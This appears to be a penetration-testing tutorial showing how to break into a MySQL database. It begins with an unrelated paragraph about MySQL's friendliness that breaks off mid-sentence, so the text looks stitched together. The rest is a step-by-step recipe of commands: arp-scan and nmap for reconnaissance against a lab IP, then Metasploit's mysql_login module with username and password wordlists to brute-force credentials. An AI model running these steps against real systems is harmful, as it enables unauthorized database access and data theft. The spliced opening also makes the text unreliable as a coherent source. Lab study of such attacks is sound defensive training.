MySQL is not the only free database management system; it also is not the only open source database management system. One of the largest differences is the user friendliness that pervades MySQL. The friendliness, starting with the cost – free unless embedded in another product
Exploiting database is a key target for cyber criminals due to a valuable information storage and a number of loopholes including deployment failures, broken databases, data leak, stolen database backup, lack of segregation, SQL injections and database inconsistencies. Any information related to database is advantageous to an attacker when it comes to generate an attack. Whether the information is about the version of database or the structure of database can render more juicy information to plan a strategy. If the version of database is outdated, it can be easily attacked through finding a suitable exploit. Moreover, weak credentials of low secure databases can help to use credential reusability or brute-forcing credentials to compromise highly secured database. Lastly getting knowledge of the schema of database is vital to perform SQL injection attack.
Step 1– #arp-scan -lo (arp-scan sends ARP packets to hosts on the local network and displays any responses that are received. The network interface to use can be specified with the –interface option. If this option is not present, arp-scan will search the system interface list for the lowest numbered, configured up interface )
Step 2– The major step of reconnaissance is scanning the target. It will determine if the MYSQL database is running on victim’s machine.It shows that MYSQL is running on the target and the port is open.
#nmap 192.168.6.136
Step 3– Execute Metasploit framework by typing msfconsole on the Kali prompt.
#msfconsole -q
Step 4– >use auxiliary/scanner/mysql/mysql_login (to crack some valid credentials of the MYSQL. We can use the mysql_login module in combination with our wordlists in order to discover at least one valid database account that will allow us to login to the MySQL database)
Type options to see the current settings of this module. >Show options
Step 5– #set rhosts 192.168.6.136 (insert the remote IP address)
>set USER_FILE /root/Desktop/root.txt
>set PASS_FILE /root/Desktop/passwd.txt
>run (execute it with the run command.)
We will get the result.